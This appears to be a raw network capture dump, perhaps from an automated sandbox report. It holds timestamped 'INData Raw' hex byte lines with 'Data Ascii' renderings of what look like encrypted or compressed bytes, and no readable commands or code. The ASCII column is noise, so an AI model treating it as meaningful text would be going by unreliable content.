                                                                                                                                                2022-09-29 12:51:37 UTC14826INData Raw: 89 9f 0c 7a b2 39 ee 9f 19 4b 6d 92 6f 5d 89 61 52 21 93 11 48 36 31 59 45 40 95 d5 68 88 7b 97 b0 38 59 7b 56 aa 62 bb 43 7e cb 46 65 c3 f4 e3 f7 f9 63 93 19 88 c3 e0 6c 8d 66 f7 38 e9 fb ce 0a c1 c9 42 35 e6 46 68 1f 99 4e d2 15 db 88 5b 8f b6 5d a2 4a 3c 58 bd 69 f2 bc 99 f5 5d a1 20 a3 d8 cb 5c 9e 80 36 e3 71 25 8a fa 40 b5 ab 7e 68 7f 53 64 bb d1 64 f5 11 33 17 18 ba 0a 16 1a b1 ba b8 54 93 58 f4 95 0c 14 35 5e 11 a4 d9 95 53 10 bc 63 ac dc 9a 7a cc d8 80 ad f2 c3 78 65 1d 64 19 6b a9 ac f5 91 32 9f f6 e3 75 5c bb 86 9f e1 d4 82 06 ad bd 41 f8 72 84 fc eb 0a b3 a9 7a cf 66 6f 35 2a 0e c7 33 c3 fc af 87 2d a8 4b 16 37 7d 24 28 85 94 01 f7 55 29 da 0c 6f 4f 0f bc c9 2a 2f 4e 09 54 5c 5c d9 5f df 88 ba c8 d8 e0 f3 fd 71 6a 51 0a ad a4 e3 4c 14 a5 79 9c
                                                                                                                                                Data Ascii: z9Kmo]aR!H61YE@h{8Y{VbC~Feclf8B5FhN[]J<Xi] \6q%@~hSdd3TX5^Sczxedk2u\Arzfo5*3-K7}$(U)oO*/NT\\_qjQLy
                                                                                                                                                2022-09-29 12:51:37 UTC14842INData Raw: b1 ae 2e 1b cc 60 a7 c6 e4 fc 61 d5 ac 1a dc 93 90 62 3f 54 e5 dc b7 f7 ea b4 d8 f0 41 d9 b5 75 35 d8 26 27 f2 0a 4d c3 76 59 93 b0 93 ed 14 1e 47 f4 b2 8f 0b bd ab 87 d0 f1 e7 25 99 cd b4 27 73 ea 8d 06 31 58 6b 7f 77 d8 5b f3 09 95 f6 f8 7d 1e 37 eb 0f fa 8a 15 0d 52 c3 cf a0 20 a0 8d e6 4a ca 18 f5 97 c5 5f 75 b2 c4 46 45 79 d8 a8 0f fc 7b 23 f3 e3 2f a8 f7 f6 d9 05 b5 43 3a cd 11 6f 0b 70 3a 7c 0e 67 ba 36 29 58 84 84 91 1f 22 78 be 13 b3 95 fc 15 59 ed 80 82 41 d5 71 33 e0 34 00 70 dc 81 82 f0 3e 99 c7 40 3c 6d 37 62 b9 4d 78 e9 fc 9d 4f c1 41 7b 04 40 f6 59 a7 c1 fd dc 26 f0 79 17 87 ea a4 90 b1 84 90 01 f7 92 c5 ef a7 a0 19 a2 54 e9 f0 47 3e 84 e6 56 1d 2f dc 01 f9 ec c7 43 8c e7 80 7b 1a 15 5e 02 c5 f4 bc 1c a1 59 90 cf b8 b0 34 a6 e4 ac 6f 74 44
                                                                                                                                                Data Ascii: .`ab?TAu5&'MvYG%'s1Xkw[}7R J_uFEy{#/C:op:|g6)X"xYAq34p>@<m7bMxOA{@Y&yTG>V/C{^Y4otD
                                                                                                                                                2022-09-29 12:51:37 UTC14858INData Raw: 29 86 62 3d ad 2a fb db 15 7d 0f d2 28 f2 12 49 bc fa ee 89 fb 59 e0 ed fb d2 92 06 9e 6b 77 6a ba 6c 5c 69 8c 15 61 58 b4 c9 8d b8 e8 e8 82 55 7e 5f d5 ff 14 f6 7f fa de 77 3a c0 89 91 1a 6a 86 c3 06 99 cd 88 d0 d9 3e 5a 14 99 4e d3 3a 17 15 2c 3f 80 0c 9b ec 1c 4e 66 ad 66 55 bb 7d 2c 19 70 2d 51 b3 42 e2 1f eb c0 e9 4e 51 d9 81 72 ae 93 60 f1 9d 45 82 19 6b 94 a2 e3 6e 50 12 d4 63 64 94 6e 1d d5 ca 03 50 45 b2 e0 79 52 ff 3d 30 3e 0c a7 df 50 60 e3 b6 f7 a6 23 e5 88 31 ba 31 b9 44 f3 5b e6 3c 0b 90 d7 25 d1 d2 a4 e3 40 39 e4 44 2e 31 a8 5e 7c 30 7f 0d 65 f6 04 3b 46 1a 34 69 da 0c 72 75 c8 6a 75 a3 de 16 a1 a4 1a 29 6d 6b 49 ba 1b 0c bc 32 f9 79 c7 7a bb 5e 5a 36 6f af b2 04 9e f4 09 6f 45 56 77 be 0f e2 7e e3 a3 d5 7c 5e b3 2d a1 ae 33 0b b8 00 89 8b
                                                                                                                                                Data Ascii: )b=*}(IYkwjl\iaXU~_w:j>ZN:,?NffU},p-QBNQr`EknPcdnPEyR=0>P`#11D[<%@9D.1^|0e;F4iruju)mkI2yz^Z6ooEVw~|^-3
                                                                                                                                                2022-09-29 12:51:37 UTC14874INData Raw: ab a2 0e 5f 17 cc 2e ec 85 70 4b 8e 8f e0 44 2e 5c e3 8a 0a c2 ca a2 f6 ec d8 bc 10 91 7f 51 58 3b e8 17 d6 92 2f dd 53 5f 3c f0 32 8e d6 9f db e6 46 4c c2 ec 59 f9 be f7 a5 05 aa a9 ff 92 9b ce d6 51 6c 79 7d c8 86 8f da 70 ef 95 7c 26 87 85 3e 0d c2 bf 01 d7 d6 1c cf d2 51 1b a4 dd aa d2 34 4d 1c 9f e8 7f c3 66 52 80 9b 29 26 0c 98 e0 de 5f a8 b9 e9 01 e0 8a f5 97 46 e9 c0 3d 85 59 8b 00 6b 54 e2 ea 16 00 c8 5a 74 4c 88 d6 dc 39 6a 11 18 10 4e 09 91 eb 31 86 0f 59 04 7b ea d2 d2 28 71 08 cb fb cf 70 9f 43 05 12 69 e1 de 22 b1 0c 2a cc 90 71 ba 7f 82 22 b0 1d 93 a7 1e fe 5e 8c 89 c7 d7 f9 af 99 a0 77 56 9c 21 4c c0 a0 65 52 43 c6 24 5c 2c 34 c5 64 62 e4 2a e5 23 75 8f cd ab 8a a8 10 c0 1b 30 ff c7 46 56 ad 29 6d a1 f6 05 5e 36 45 2e 88 4f 16 85 6f 6e df
                                                                                                                                                Data Ascii: _.pKD.\QX;/S_<2FLYQly}p|&>Q4MfR)&_F=YkTZtL9jN1Y{(qpCi"*q"^wV!LeRC$\,4db*#u0FV)m^6E.Oon
                                                                                                                                                2022-09-29 12:51:37 UTC14890INData Raw: cb c6 81 40 fd da 69 bb 73 60 b5 83 eb 2f 71 e4 c8 b2 52 91 ab e9 8e 01 a6 7f 90 b3 e2 12 7d 4c e0 e3 32 4b fb d6 44 71 74 64 29 25 39 31 05 9d 0d 57 8d dd 0d 4b a3 eb 13 8d 80 fa a5 48 03 a5 3d da 82 77 6a d3 81 c0 eb 56 62 db b8 6c 82 3f b7 54 91 29 7e e2 95 57 06 a1 a2 65 cb 1a 19 1a 9d 90 d8 59 ed b6 45 66 25 dd ab 0d da 2a 50 cf f4 12 68 37 7f 75 09 18 9d 85 8e b6 11 99 a6 7c c7 de d9 6b a1 de 16 ce a7 a1 b3 b7 83 99 79 66 ec 27 29 18 3b 87 ce 5c c9 3a bf 29 68 ad 67 a2 d8 7d f2 e6 8f 0e 1f f4 da 5b ec 1f 58 ad c0 e8 ea a7 76 fb b0 bc 19 92 db cd de f7 22 dc 0b bd e3 27 37 30 03 91 a6 84 49 0f 6c 74 21 c5 c7 0c d7 5a 12 e4 9c 6e 84 20 12 60 97 3a 57 ea c7 96 61 17 3a fe 96 2d 9c 01 ce e8 2e 5f 5a e6 c6 32 fd 8f 0c 0e a7 fa 83 6e 99 5d 46 3a 42 4b 31
                                                                                                                                                Data Ascii: @is`/qR}L2KDqtd)%91WKH=wjVbl?T)~WeYEf%*Ph7u|kyf');\:)hg}[Xv"'70Ilt!Zn `:Wa:-._Z2n]F:BK1
                                                                                                                                                2022-09-29 12:51:37 UTC14906INData Raw: b1 ce f2 2a e4 b2 36 e1 e1 b4 fd f2 05 b9 f2 38 27 ae 32 79 42 bd 40 74 a0 94 50 b8 e2 4c f0 19 b0 0a d6 c8 10 e0 20 5d fc c1 c2 d4 53 7a 46 fd fd b7 f5 00 1e 5d 1b 56 ef 32 b4 5a ef b9 ad 6d 0c 27 5e dd f2 26 a6 e1 43 6d 7f e8 bc 3d a7 22 7d e1 67 f2 b5 17 d7 88 66 bb 19 ec 9c 1d 61 e3 01 fb a4 63 b9 63 da a7 e3 ad 82 9e 82 8a f2 a8 63 23 7a e8 84 e7 1b 36 af 30 8d 19 f6 57 d5 83 6b 86 8f 1e 58 1a e1 b3 48 c3 0c 81 c1 d6 24 18 3b f1 da 1b 68 49 f9 7c c0 b8 6a b7 a4 e7 63 8e d9 3f 04 d7 f5 d4 1a 9c 14 d4 9c 08 40 30 5f c6 25 c3 31 bd c6 c1 3d 4f 8b a8 14 b9 c5 61 61 2b 46 5c 5f d8 1d 69 8a bc 6a c5 0c 37 93 47 c1 7c a8 3d 90 12 ab c4 9a 34 04 e7 ae 35 26 f5 b8 d6 72 90 40 30 46 be 65 91 3c 8f aa af a2 b0 0f 82 f9 43 a6 29 71 c0 9e 82 c1 00 cd 1a 95 3e 7c
                                                                                                                                                Data Ascii: *68'2yB@tPL ]SzF]V2Zm'^&Cm="}gfaccc#z60WkXH$;hI|jc?@0_%1=Oaa+F\_ij7G|=45&r@0Fe<C)q>|
                                                                                                                                                2022-09-29 12:51:37 UTC14922INData Raw: 70 45 2f 7e fc ca 13 1c c9 9e d6 43 fe cf dd 66 bf b0 39 4b bd 30 bc 05 fa 0f 33 74 fb c8 f3 33 c8 10 20 a8 d7 29 be 31 57 3c be 23 f9 b9 2c 79 8a 2c a1 ee ba 56 45 97 6d 68 ec bd 8c 64 a3 9a 2d ea ce fc 32 3b 39 1e 2c 53 7d 04 c6 d5 ca 43 11 bd 7f 07 bb 21 4e b7 9c 4f 97 a9 7c 48 ea 81 44 08 58 dc b1 d2 25 73 59 9d 86 fc 1f fc 56 4d 0e 31 12 3b 87 53 c4 62 fa dd e3 d8 f1 0b 89 9d 2e a9 bf 59 dc d2 84 6a 6f d7 69 a7 5b 95 fa a4 7e 3f 8b 94 65 e3 76 43 fd ce 0b 95 f8 0f 38 44 e1 56 e4 54 fd 39 31 6e 0b d2 9a ee eb 37 68 3c 37 b5 cc 35 61 22 41 66 a6 95 cb 03 80 50 20 5a cd 3e 7b 61 21 f2 86 8d b2 f7 9a 84 0b ad 86 9e bf e0 c6 a8 90 ad d9 c0 e4 8a 04 3c 06 94 a4 c6 5d 14 04 18 3a 5a 28 5a 02 9c dd d9 bd 2c d4 e7 cc c4 df e7 9f 63 ab f2 01 80 64 fd 62 b8 11
                                                                                                                                                Data Ascii: pE/~Cf9K03t3 )1W<#,y,VEmhd-2;9,S}C!NO|HDX%sYVM1;Sb.Yjoi[~?evC8DVT91n7h<75a"AfP Z>{a!<]:Z(Z,cdb
                                                                                                                                                2022-09-29 12:51:37 UTC14938INData Raw: ef a7 65 19 11 34 d6 53 66 8b f7 38 9d 01 32 77 fc 04 dd 22 42 76 23 1c 1f bb a7 cc 4c 47 9e b9 4a 11 5e 33 f7 c8 f9 fd 65 4e 9d e3 ca 8f 6d 6d 09 8b 23 d8 7b 2d 2b b2 ef cf f5 41 cc 1f d5 84 1b f7 17 b4 1d 16 c3 8e ab 66 52 91 54 30 2b 0f 78 88 15 e0 01 a6 d5 9c 93 c7 e8 6c 9b 26 a4 69 f8 30 e8 ef 7e f0 ca c4 96 7f 27 9f f2 54 78 20 f0 6b a8 9f 0d 69 ce 4d a5 68 ec 67 be 44 2d 79 99 2e 9d dd 67 29 93 5f 1a 64 32 1e a2 09 ec 10 a3 2f 08 ff 47 e5 ac bf 07 bf 8d 3a 58 c2 5e ff b7 bc 43 91 e3 0d d3 0d 33 00 f3 4a 3a 7e 1a 27 f2 2d d0 53 72 e9 4f e4 a1 3e ce 9d fd d7 68 7c 37 af 70 ef c4 e9 3d 1a 5b 18 0a f6 1b ab 23 e8 fc 88 ee 57 24 80 7d d6 73 ad a1 99 bc f5 2a 52 03 ef bc c5 19 82 37 f5 97 3f 33 22 bd 6e e2 08 23 df 7a 61 da e5 d9 6f 3b ec 3a 61 0a 98 36
                                                                                                                                                Data Ascii: e4Sf82w"Bv#LGJ^3eNmm#{-+AfRT0+xl&i0~'Tx kiMhgD-y.g)_d2/G:X^C3J:~'-SrO>h|7p=[#W$}s*R7?3"n#zao;:a6
                                                                                                                                                2022-09-29 12:51:37 UTC14954INData Raw: 64 ee 41 90 d8 41 98 e4 45 50 4c b3 2e b1 5e f7 86 a5 2e 8e e8 6a 6a dd 63 4f a7 ae b9 a7 c5 8b cc 1c 30 b4 90 92 0c 94 8c 94 65 bb f3 fa bd 7f d9 f1 6e 7c 0a 68 18 ab 97 4a 6f 63 09 58 11 f8 bd fc 41 73 6b 17 f1 a3 cb 94 db c1 83 e7 84 88 b4 fc 1e ec 7f 64 d7 ce 6f d7 29 47 e3 d3 ba 56 7d e2 33 96 28 05 30 a1 91 78 04 9a 9e 86 59 6b ef 84 66 3d 6c d1 81 e3 0d 35 b6 dd 42 a6 e1 7a 24 71 19 a7 c3 f9 5d e3 9d b9 28 4f a5 94 9c ee 09 c4 30 49 8c 5f fd b6 f7 9c dc 91 99 b7 fa 08 45 90 9b 37 e4 10 19 b3 82 15 d2 f7 b6 92 95 6c 77 77 f1 8f 9c fa dc dd 3d e0 90 dd ad c3 70 f3 af be 51 45 66 46 05 e2 38 89 ac 1d 40 5c 95 54 2f 92 ae 63 73 bb 19 d5 2f b3 a4 4b 44 24 90 8e f8 1f 68 8d ac f8 f4 49 70 dd e1 e7 ea 69 21 d4 57 dc ad a3 da 79 54 3c 65 49 f1 b9 c5 b8 18
                                                                                                                                                Data Ascii: dAAEPL.^.jjcO0en|hJocXAskdo)GV}3(0xYkf=l5Bz$q](O0I_E7lww=pQEfF8@\T/cs/KD$hIpi!WyT<eI
                                                                                                                                                2022-09-29 12:51:37 UTC14970INData Raw: 6e 56 e3 7f bb 91 7b d1 d8 46 ca 61 b0 af b9 a2 90 bb fd 41 12 1b 66 14 8e 7f 77 81 0a 21 33 48 2a 00 61 a1 68 66 be b7 ae 3c d7 83 81 d3 ad dd 61 1e 8b 72 21 53 b3 4a 71 a4 3a 5e 3a 66 20 87 13 f0 09 1a ae 49 70 08 c5 2d ee e1 08 de 8a 3b 8f a1 48 ee e4 69 c1 37 d7 93 1b e0 d1 76 55 e1 31 6c 29 0b b5 8a 7f 88 c6 66 7e e8 27 71 67 95 ac 9f 07 d7 95 e0 e6 2c f6 46 d4 22 b1 b9 2f 60 17 3b ce b8 9b 31 af 7a a3 1f af e3 09 dd 49 9a cd 44 54 a0 43 63 87 22 8a b4 71 d4 92 19 48 50 ab 5a fa f7 a0 94 6e 15 11 52 28 c2 8f dd 62 91 54 48 ae 83 73 0b 6e 2a cd b6 a2 7a 9d 2a 64 50 50 99 d6 3a 9f 2b 5d de 42 ef 3c e6 50 11 fc 4a 77 37 31 85 27 52 cc 8a 9c 70 78 2d 2c 7d da 5a ce 80 fb 75 e2 65 85 ee 20 d6 a3 42 0b 99 c0 f4 65 9e ae 80 bc a4 78 2c d1 27 69 0b bf 1a d4
                                                                                                                                                Data Ascii: nV{FaAfw!3H*ahf<ar!SJq:^:f Ip-;Hi7vU1l)f~'qg,F"/`;1zIDTCc"qHPZnR(bTHsn*z*dPP:+]B<PJw71'Rpx-,}Zue Bex,'i
                                                                                                                                                2022-09-29 12:51:37 UTC14986INData Raw: 1f 4a 9a e1 c2 94 3f 11 ab 0d 0d 84 10 1c 05 c2 4f ec 78 f8 8c e2 e2 cd 5b ed 7a 15 eb e7 3c ba e4 8f 40 6b 73 c1 d2 d0 a7 75 1f 8c 0f eb 0b cf a5 b6 52 fd dc 1b 19 45 89 b5 d3 30 da 62 01 44 26 22 ea 34 cd 5f 22 c8 cb e2 34 37 45 4a f6 bb d7 1c 78 ac cf a9 19 6f b4 32 45 32 26 cd 2e d5 90 4b fe d9 a0 60 cf 3a 1b 50 bf eb 72 64 00 28 fb cd 86 ed c5 57 1c 95 51 4e 78 74 d1 ec 3c 7c 00 05 33 99 20 4a a9 3a 32 e2 27 d3 9b 0c ab 74 84 09 d3 92 37 c2 4a c3 48 15 20 68 87 73 58 af 07 a8 78 e4 6a 88 84 ba b8 00 54 da 30 a0 f3 cc a2 ce 24 71 42 15 bf e1 d5 7d 63 37 28 97 60 5c 2b 75 00 dd 0d 0d 3c 95 15 7b ba 7e ab 02 d9 2a 1d 72 2d 67 2e 75 ac d2 07 db c6 bf 8b e9 87 0d c4 cd fd 3b 35 89 b8 38 98 e9 c8 9e 82 8e 44 cf fa 59 bf a0 be b8 89 af 68 63 55 a8 bf 15 9d
                                                                                                                                                Data Ascii: J?Ox[z<@ksuRE0bD&"4_"47EJxo2E2&.K`:Prd(WQNxt<|3 J:2't7JH hsXxjT0$qB}c7(`\+u<{~*r-g.u;58DYhcU
                                                                                                                                                2022-09-29 12:51:37 UTC15002INData Raw: 68 6b fc a7 9c 24 da c9 23 3c 7d 6b 8c f7 18 60 9b 30 2c d0 39 33 4b 69 8d e2 47 7f 8e 1f f0 e9 97 f9 55 6d 51 af d7 67 24 df 5c 31 73 06 cf 20 ab 3a 65 b7 2a 62 30 32 3f 94 8f e0 21 f3 cc 4c 9b 0b c8 19 7d bd 08 00 d1 79 3a fc 49 69 7f 41 4b d9 03 69 0d 0e 88 5f e5 fd 6d 4d 84 dd 44 f1 5b c0 7d 24 50 e7 cc b3 1a 70 7c 1f 0d 08 1f d2 67 c3 13 53 98 78 93 26 55 d4 2a 60 62 08 72 c4 44 dd 02 38 aa a8 5c da 54 7b f5 c3 bc ce 10 5d 77 a2 38 bf 0b 6e bb b2 a1 26 4d e2 9c fe c7 67 d9 a3 a7 7a 58 5f 79 ee d2 d7 bc bb a5 4b c2 cd 17 92 98 fd 5a 33 85 11 87 33 71 a7 d5 8b 17 8f c3 e1 eb d4 bf bf bb 9e 0c 5c 09 a9 53 32 b3 67 b8 46 e3 e9 a8 b0 45 83 4b 7b 46 12 1b c0 c6 25 57 a4 99 90 a0 3e 13 9a de 2b c7 16 fd 4a 7b 5f c4 d3 6f 64 56 c4 ec 02 5a 5a ca 1c 51 c9 ba
                                                                                                                                                Data Ascii: hk$#<}k`0,93KiGUmQg$\1s :e*b02?!L}y:IiAKi_mMD[}$Pp|gSx&U*`brD8\T{]w8n&MgzX_yKZ33q\S2gFEK{F%W>+J{_odVZZQ
                                                                                                                                                2022-09-29 12:51:37 UTC15018INData Raw: d8 67 d4 b8 ad 44 4b cc 4f fa 33 d0 f9 46 4a 1a c2 b6 a9 e9 65 49 c0 ae d8 8f 06 15 4b a7 92 36 72 86 8e b0 fe c2 a9 1a 63 4d 2b 73 d0 6e d0 59 01 80 1b c9 34 8f c0 51 07 23 4b b9 85 2c 6e 66 70 14 b7 fd 77 9c 67 0e 71 3a 3e 84 00 35 07 3f ec 65 95 ee 13 7d 77 25 65 0a d2 f4 5d e6 ab 20 40 e3 68 eb 87 a6 fa 6b 11 55 74 c6 48 db 35 83 67 f0 4b 57 a5 d3 8a 5c 05 bb 7c 43 c7 ab bc 3f 63 aa 1b 5c 4b 85 e2 ea e7 e5 1a b4 08 fb d0 59 a9 36 db f9 4a 29 40 dd 32 67 a3 b5 c9 42 9a 12 19 59 3d 97 7c f9 15 a8 e2 1a 1d 67 00 ef f8 53 72 38 4e 7a c0 85 75 b8 3e 51 04 2b 82 59 c4 80 e3 3b 06 db 9f 01 fe 98 ba 53 6e 23 df 80 3f 82 47 ba 1c 0e 17 a9 61 56 34 d8 f5 ef 18 c1 a0 de 88 12 fc 82 ba b0 71 51 f2 72 71 2a 9e 17 30 2c fe 37 16 34 2f f5 56 c5 93 03 6e 41 f7 37 99
                                                                                                                                                Data Ascii: gDKO3FJeIK6rcM+snY4Q#K,nfpwgq:>5?e}w%e] @hkUtH5gKW\|C?c\KY6J)@2gBY=|gSr8Nzu>Q+Y;Sn#?GaV4qQrq*0,74/VnA7
                                                                                                                                                2022-09-29 12:51:37 UTC15034INData Raw: ba ec 12 b4 97 b9 95 6d a5 5d 53 8b 93 15 6c 7c 33 5b 85 41 2a 03 2b 99 bb 20 bf 43 9e b5 4a 33 3a 8b bd a0 f0 b3 36 2f 20 ae d1 88 ba 51 86 26 07 38 fb 37 d3 74 96 a2 6e 2c 5f 97 6d 92 62 26 03 5c 21 47 47 42 9a 58 44 15 1b c1 50 15 79 28 fa 3f fd da 42 d8 13 23 26 c2 4d ce 06 fb 1d 51 9a 9c bd d3 1b 07 f8 f1 25 80 b3 df 31 3d 17 b2 6a 77 07 f6 f6 c1 65 a4 28 28 f3 33 24 6d 72 c7 f2 de 81 58 9a a4 10 cb 00 d1 d6 26 d3 a5 57 98 41 9d f9 5c 73 25 e1 88 83 d5 27 be d4 29 38 2c 9b 3a f2 b2 a4 9b 1d 20 a8 82 63 b9 ac be d6 0e 42 8a d9 d1 11 89 b4 a0 32 3b 29 89 38 34 d0 23 f4 99 95 d3 28 bb b7 63 20 f0 7a e5 c6 06 eb 75 c2 b3 72 c5 9f d2 f4 c6 16 bb 98 98 74 3f 60 60 3d b8 d9 3d 8a e0 85 43 0d 4b c8 3b c0 8f 00 55 04 e2 dc a1 7e e8 79 68 41 84 25 a7 5f c6 45
                                                                                                                                                Data Ascii: m]Sl|3[A*+ CJ3:6/ Q&87tn,_mb&\!GGBXDPy(?B#&MQ%1=jwe((3$mrX&WA\s%')8,: cB2;)84#(c zurt?``==CK;U~yhA%_E
                                                                                                                                                2022-09-29 12:51:37 UTC15050INData Raw: b2 f4 55 69 4d bf 50 1b 62 cf 43 2c df 94 d6 8c c3 73 50 37 44 a4 8c 78 bf 9d b2 d8 08 10 4f 62 8e b1 7a 6f ea 3d e4 28 55 ce db 30 44 fe b9 85 d0 1a 61 d8 86 8e 07 4d 40 18 b2 61 d0 1b 5e 94 95 5a 48 f3 c4 4a 24 f2 19 90 bb f9 6a f7 ef 96 7b d6 bd f4 9b 8f 43 d3 d4 3a 88 88 69 3c ff 84 3c 39 12 74 3f 08 3d ef a9 62 10 39 0c e3 dc 8f dd 35 6d ba 43 52 36 a9 ca 6f ee b4 2c 41 f4 b2 fc 95 5f eb 4e af 58 7a 72 84 ad 62 d1 7b 68 f8 ae 1b bd b5 c4 d6 4e c3 a1 d6 42 58 03 7b 37 75 4e 76 1a 73 b4 3b eb 20 61 7f 25 37 b5 9c ca 5d 6d 2e 21 8e 73 be da 1d cc 05 cb da 88 05 29 24 d1 09 be 07 59 33 71 04 b7 46 0f ab 2a fd 77 d6 72 23 46 56 d0 64 28 a0 82 14 84 f4 4a a6 48 f9 b2 68 e1 a4 07 60 ce 57 8e d1 a4 20 09 53 26 57 b7 b9 2d 9c bc 18 4a 7c 75 b3 4c 9d f3 77 f2
                                                                                                                                                Data Ascii: UiMPbC,sP7DxObzo=(U0DaM@a^ZHJ$j{C:i<<9t?=b95mCR6o,A_NXzrb{hNBX{7uNvs; a%7]m.!s)$Y3qF*wr#FVd(JHh`W S&W-J|uLw
                                                                                                                                                2022-09-29 12:51:37 UTC15066INData Raw: dc c7 4c 8e 4e 16 37 f9 8b e0 32 00 53 99 3c 5c e7 56 ee db 5b 76 b6 71 52 10 06 a9 a9 d8 4d b2 83 84 cd 9f 49 b7 eb 7f 69 ad 71 41 39 bf eb fe 59 73 3b 4b ae f7 6b ad 93 b1 cc a6 d5 60 4e 86 e5 df 92 3f 9b 00 7e 4e 9d 74 0b b9 5e 11 30 39 b5 04 2c 4b f8 41 23 cd ee dc d9 db 0b 37 c9 6e d7 8f 8c a9 eb e3 e1 07 19 e1 9c 63 ea 20 c6 6d ab 54 22 a2 f6 07 0b e2 90 23 59 57 49 9b 4d 4c f6 ee 0f af cd 59 19 f1 15 42 48 68 e0 db 99 c4 3d 68 c3 b2 fd 15 63 f2 69 3f b4 4c e1 71 83 62 f6 b5 5e 5c a4 e9 48 ef 89 7d b4 aa f5 8f ad ec de 47 30 00 4e 2b a9 d9 2d 67 5d df 6e d8 3a c7 e7 7a fc 6d b5 c6 16 4c d5 94 d7 d5 44 3a eb 89 d2 5a aa be 81 72 05 5d 31 fb 06 7b 5d 19 9a d5 17 bf 54 1c 44 82 da 3d c9 05 c5 a4 19 e9 c3 f2 de 32 95 e9 d0 ae 42 3a e8 f2 d6 65 46 e6 c7
                                                                                                                                                Data Ascii: LN72S<\V[vqRMIiqA9Ys;Kk`N?~Nt^09,KA#7nc mT"#YWIMLYBHh=hci?Lqb^\H}G0N+-g]n:zmLD:Zr]1{]TD=2B:eF
                                                                                                                                                2022-09-29 12:51:37 UTC15082INData Raw: 9d b0 29 3f 97 6b 32 71 18 73 28 53 9c 88 95 b4 74 da bf ca 45 e0 20 ee 1d 3f 75 ae c0 06 f2 62 80 0e d6 e2 7c 01 ea b6 17 47 32 f9 d8 79 67 75 6e 01 98 84 22 98 7a d6 f9 4e 5d d5 45 26 b5 82 84 ca e7 de 2d 76 7e a0 cd 89 69 1b 15 8f 17 98 f5 66 78 22 da e0 6b b7 86 d6 bb f7 20 58 73 21 f4 6a fd e9 f8 5a e2 5a be e8 d6 2b e4 08 4b 6f 45 34 fd b5 cc 13 96 79 b3 0e 84 58 ee 61 12 05 7d 14 86 c6 0d 77 4d 22 da c6 c2 05 dd a0 d8 99 c0 57 a6 a4 14 5b 8e 7f e6 b9 c3 81 13 bc 3c 9f 7a 85 a5 65 55 46 3d d7 0e da b4 3c 60 f2 b3 b6 05 23 4e 95 ba 69 82 ad 80 4f 36 7b 74 5e e3 64 c3 d5 03 dd a0 81 3c 3f 69 ca 3a 95 d9 87 f7 0e b7 01 88 f3 d4 3e d7 03 af 72 1e 80 b7 d1 f2 c1 7b f1 aa 84 0e 53 c3 6b c8 8f ed 5a 65 14 68 04 74 06 67 30 cf 38 4b f6 ec 1f 59 6c f3 1b 8a
                                                                                                                                                Data Ascii: )?k2qs(StE ?ub|G2ygun"zN]E&-v~ifx"k Xs!jZZ+KoE4yXa}wM"W[<zeUF=<`#NiO6{t^d<?i:>r{SkZehtg08KYl
                                                                                                                                                2022-09-29 12:51:37 UTC15098INData Raw: d9 d6 49 cc 70 a0 49 c3 08 64 c3 28 e9 23 c4 f4 61 66 25 9b 9d 92 e1 dd 08 30 e8 85 31 5f 43 2c 89 f3 fc 6a 38 ff 8e 5f b4 c1 37 66 3a 2e 5e b7 e0 fc 16 81 d9 2f 7f 05 bb 6a 88 22 33 f0 35 b5 1c dc f3 0d 95 ef a5 95 7d 7a f0 85 91 53 19 5b 8e 4b 18 a7 be 5c 20 6b 58 53 17 0b 32 85 a2 40 d4 0b ad e7 e6 a9 a0 a4 79 3b 96 10 19 64 f6 c2 0d 5c 9d 08 69 30 69 fe aa 4c ac 2b 1e 8d 21 c3 6f 0e 72 5e 78 bb 42 a5 8d a1 7d fd fb 38 bd 1e 2d 1d dd d6 66 9f a8 eb 8d 44 cd b6 5b 4d 7e 45 8c c0 55 19 18 d1 99 90 9d 65 4e 40 c1 90 82 72 d0 43 e7 5a a5 eb 26 4b 4c 18 7f 2b 8e d5 ab ca 22 83 de e7 d2 e0 33 76 b6 ff be 9a 36 53 51 3b aa bd 4a 28 33 e4 37 65 52 09 2e c7 75 3d 00 7b a4 9f 7f 8a e7 c0 ec a0 d4 61 f4 64 94 0f ce 6e 46 14 5b 7a 25 48 3d 2d 45 0e ba 1f 61 d1 91
                                                                                                                                                Data Ascii: IpId(#af%01_C,j8_7f:.^/j"35}zS[K\ kXS2@y;d\i0iL+!or^xB}8-fD[M~EUeN@rCZ&KL+"3v6SQ;J(37eR.u={adnF[z%H=-Ea
                                                                                                                                                2022-09-29 12:51:37 UTC15114INData Raw: 30 60 7a 3b af ad 13 bc 84 82 19 10 54 aa 3a 80 81 b6 11 d9 e2 5e 11 f8 22 3a 12 28 39 a1 0e f3 7b 13 d3 0d 50 f1 26 eb 5f 1a ae 1e 97 ca 1c 23 65 43 10 3b f2 4f 30 75 b3 8a 04 ac ec c6 13 3d 42 d3 7f 9a 7d f5 81 f8 c9 59 12 f9 78 3b 56 b1 68 74 ef 6b 55 26 d8 9a 99 b9 1f f0 ca c3 e5 be 36 1a 9e b9 cf 8a 1e 0a b7 7a 6c 46 0e bc a5 c7 1b 32 75 4f 57 b8 3f 6b 2c 3f 37 a5 59 95 3f 90 d2 0c 66 fb a8 bd 89 23 13 87 41 42 73 49 00 8e 4d 4b 09 dd d7 3a 9e ff 88 10 f6 4c 93 e2 8e bf 57 42 63 12 5b ec 48 0c b1 c5 ed ef 76 9d 52 c3 e9 4c 70 7c 5b ef dd ae 33 06 33 33 5d ec 93 c5 39 43 94 a0 cd e3 e6 eb c4 30 92 06 d5 60 e4 33 dc 27 17 1e 80 e4 bf 4f 6a 03 91 16 4c 06 a8 4b ee 43 99 f1 cb 73 b9 2f 0a 32 6b f4 d5 06 31 fb 0f 50 07 2d 3e 73 d5 d3 e3 98 b9 82 88 b3 61
                                                                                                                                                Data Ascii: 0`z;T:^":(9{P&_#eC;O0u=B}Yx;VhtkU&6zlF2uOW?k,?7Y?f#ABsIMK:LWBc[HvRLp|[333]9C0`3'OjLKCs/2k1P->sa
